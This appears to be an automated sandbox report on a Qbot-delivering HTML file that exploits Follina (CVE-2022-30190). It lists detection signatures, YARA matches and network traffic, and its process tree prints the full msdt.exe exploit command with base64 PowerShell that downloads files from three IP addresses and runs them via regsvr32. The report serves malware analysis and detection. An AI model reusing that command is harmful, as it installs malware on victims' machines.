Edit tour

Windows Analysis Report
Qbotfollina.html

Overview

General Information

Sample Name:	Qbotfollina.html
Analysis ID:	641285
MD5:	a32050027aea96b3b70e1056490a98c9
SHA1:	ef28c67583c8c8048c0baaead036680a60441213
SHA256:	e3ba1c45f9dd1f432138654b5f19cf89c55e07219b88aa7628334d38bb036433
Tags:	FollinahtmlQbot
Infos:

Detection

Follina CVE-2022-30190

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

JA3 SSL client fingerprint seen in connection with other malware

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

chrome.exe (PID: 3960 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\Qbotfollina.html MD5: C139654B5C1438A95B321BB01AD63EF6)

chrome.exe (PID: 6188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1504,9164953901427167469,2460945290142951251,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)

msdt.exe (PID: 408 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Qbotfollina.html	MAL_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190	Tobias Michalski, Christian Burkard	0x1447:$re1: location.href = "ms-msdt:
Qbotfollina.html	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.700178209.00000287043D4000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190	Nasreddine Bencherchali, Christian Burkard	0x24f0:$sa1: msdt.exe 0x25e0:$sb2: IT_BrowseForFile=
0000000A.00000002.699853549.000002870412E000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190	Nasreddine Bencherchali, Christian Burkard	0xb21a:$sa1: msdt.exe 0xe910:$sa1: msdt.exe 0x16f50:$sa1: msdt.exe 0x17040:$sb2: IT_BrowseForFile=
0000000A.00000002.699747541.0000028704110000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190	Nasreddine Bencherchali, Christian Burkard	0x23c0:$sa1: msdt.exe 0x23fc:$sa1: msdt.exe 0x2c2a:$sa1: msdt.exe 0x3c05:$sa1: msdt.exe 0x24ee:$sb2: IT_BrowseForFile= 0x3c7e:$sb2: IT_BrowseForFile=
Process Memory Space: msdt.exe PID: 408	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190	Nasreddine Bencherchali, Christian Burkard	0x76:$sa1: msdt.exe 0x13f3:$sa1: msdt.exe 0x4a2f:$sa1: msdt.exe 0x8413:$sa1: msdt.exe 0x88f6:$sa1: msdt.exe 0x8fd8:$sa1: msdt.exe 0xb2c2:$sa1: msdt.exe 0xe278:$sa1: msdt.exe 0x12353:$sa1: msdt.exe 0x15309:$sa1: msdt.exe 0x1a35c:$sa1: msdt.exe 0x1d347:$sa1: msdt.exe 0x22f28:$sa1: msdt.exe 0x22f45:$sa1: msdt.exe 0x2335b:$sa1: msdt.exe 0x23496:$sa1: msdt.exe 0x23fda:$sa1: msdt.exe 0x252f5:$sa1: msdt.exe 0x25353:$sa1: msdt.exe 0x2721c:$sa1: msdt.exe 0x904f:$sb2: IT_BrowseForFile=

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: unknown

DNS traffic detected: queries for: accounts.google.com

Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20220308T163202Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=c1b34aff136b43349b443c74f36772f8&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1418352&metered=false&nettype=ethernet&npid=sc-310091&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&rver=2&smBiosDm=VMware7%2C1&tl=2&tsu=1418352&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32319&sc=6Cache-Control: no-cacheMS-CV: i4aliLCJNUqJo4L5.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20220308T163202Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=66bcbc0609d3466c8a0539d805ee6fc3&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1418352&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1418352&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32319&sc=6Cache-Control: no-cacheMS-CV: i4aliLCJNUqJo4L5.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.18694.9007199266247846.b5c49955-e050-4553-b8e4-0e223ed6c5a1.4e8e78d2-c2c2-4c02-8d8c-46ac3b2419e7?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.15881.13753891519397067.8011a592-e549-44a6-8073-41dcd83eddbe.bcf361e4-21f7-429d-877a-6c55c1b655ff?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.16574.13571498826857201.00a9d390-581f-492c-b148-b2ce81649480.6a6f592e-efa9-4bb0-b008-7c3422ab3313?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.18858.9007199266246227.c596c546-6fcb-4260-935c-19bc24b971ef.1b03c26f-1753-4221-9ab1-4581f098723d?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.10288.13753891519397067.8011a592-e549-44a6-8073-41dcd83eddbe.12bb65f7-1014-4469-bb2e-59f575e79b05?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.2052.9007199266247846.b5c49955-e050-4553-b8e4-0e223ed6c5a1.a0c3decd-308f-4f06-bcfb-2aa4f3afe248?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.39478.14495311847124170.e89a4dce-fd9a-4a10-b8e4-a6c3aa1c055e.8ad1b690-ff36-44fa-8afc-0dc5bed1273c?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.40093.9007199266285780.3d16d9fa-052b-42c5-ba7d-a5688e3dda24.e6964d6a-18a4-4746-9238-9f0acc233a65?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.256.14495311847124170.e89a4dce-fd9a-4a10-b8e4-a6c3aa1c055e.ca4cbefc-0ab0-4144-90c1-07f5250c8c21?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.20893.13571498826857201.00a9d390-581f-492c-b148-b2ce81649480.acc28f88-50de-4aaf-abfc-ad1da8b04cd0?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.49525.13510798887047136.8a1815b2-017c-48c8-80cc-ca4d1ae5c8cf.2f6b9bdf-a4fc-42d8-aea0-65c437755b78?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.58298.9007199266285780.3d16d9fa-052b-42c5-ba7d-a5688e3dda24.55988ee1-bd9b-4322-980a-a610abdc7713?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.616.13510798887047136.8a1815b2-017c-48c8-80cc-ca4d1ae5c8cf.d81cfd95-c9fd-48e0-8fc3-36ff7b9e590a?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.15982.13510798883386282.38bb6176-27af-4000-85dd-12a4c12514f2.7bbbe321-5273-45d0-814e-74f2065197d3?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.64128.9007199266246227.c596c546-6fcb-4260-935c-19bc24b971ef.d58015ff-2fcf-4113-975b-e873039b6d86?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.10318.9007199266246761.cc710c1e-2e5d-4241-97cb-d944f43f9af1.8cf0ef1a-60ff-4508-85ab-fd3d7f02c6a3?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.16957.14618985536919905.4b30e4f3-f7a1-4421-840c-2cc97b10e8e0.aef04b90-a221-4ea5-a05d-0d51ac792471?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.18124.9007199266244427.c75d2ced-a383-40dc-babd-1ad2ceb13c86.afc6c372-c7a8-4eda-94fb-541bbb081d14?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.31225.13576748414566955.3d986480-8c1e-4271-9c7c-a90619002084.3ffd9abd-094d-4594-b6c3-8e079298b84b?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.39016.9007199266243744.36dde9d0-f21a-47d2-976e-f1ea3f5b031f.bbea1229-a466-4a8c-b428-57cb58abf084?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.31660.13925855090824389.09f473d9-ce97-499c-9d53-c21e8f64ee62.9cf7ca2f-497e-4cb1-be08-431c9fcc4d54?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.23070.9007199266246761.cc710c1e-2e5d-4241-97cb-d944f43f9af1.8e7acf32-4622-490b-b63f-0ba9c0d9a24e?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.32938.13925855090824389.09f473d9-ce97-499c-9d53-c21e8f64ee62.721cfb02-7935-45dc-9d66-2d6e6b2ff76c?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.41671.13634052595610511.c45457c9-b4af-46b0-8e61-8d7c0aec3f56.86b1d82d-8b47-4bda-99fc-8a1db0a7ac9d?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /image/apps.5075.9007199266244427.c75d2ced-a383-40dc-babd-1ad2ceb13c86.f329a73d-1ae8-4445-aa4c-bf40f3c5d62d?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.51843.9007199266243449.90709ce3-050c-4cef-8d4a-9ef213b89ef2.c13e8407-eaf8-447a-a5d6-9abd8bc2c1f3?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.54562.13634052595610511.c45457c9-b4af-46b0-8e61-8d7c0aec3f56.24af4abe-62f8-404b-b1a9-ee8fe4d32d94?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.52481.9007199266243744.36dde9d0-f21a-47d2-976e-f1ea3f5b031f.16c0a704-aef8-4bc4-af36-0c3b3ee0f6e2?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.54145.14618985536919905.4b30e4f3-f7a1-4421-840c-2cc97b10e8e0.0df01b4e-7fca-47eb-b3d7-95ba7990754d?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.55990.13510798886747090.a0953092-5fc3-46f0-aefa-796cb3a9b90b.1c9f2174-7e18-48ba-af90-e569a2444a83?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.56668.13510798883386282.38bb6176-27af-4000-85dd-12a4c12514f2.a2d9522a-f7d1-4f21-9ea4-8ba298101695?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.59367.13510798885854323.dbec43fa-fcea-4036-9b1c-96de66922c18.da850a8e-5b3f-49fd-b3dc-6a8c0db400e4?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /image/apps.62687.13510798885854323.6a8c11ad-84e9-4247-9ba9-ab3742bdbb87.e61dfadd-3bdd-4f66-beb1-6bb763b60b02?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.7873.9007199266243449.90709ce3-050c-4cef-8d4a-9ef213b89ef2.7885dc21-4015-4284-a596-d3d24cf6c1b8?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/apps.8341.13510798886747090.a0953092-5fc3-46f0-aefa-796cb3a9b90b.fc0c6be7-c064-44dc-a7df-81e7097e3c93?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Thu, 20 Apr 2017 16:10:39 GMTUser-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /image/apps.65344.13576748414566955.3d986480-8c1e-4271-9c7c-a90619002084.2a7e9f85-6e2d-4bc7-ad81-13196f5baf00?format=source HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
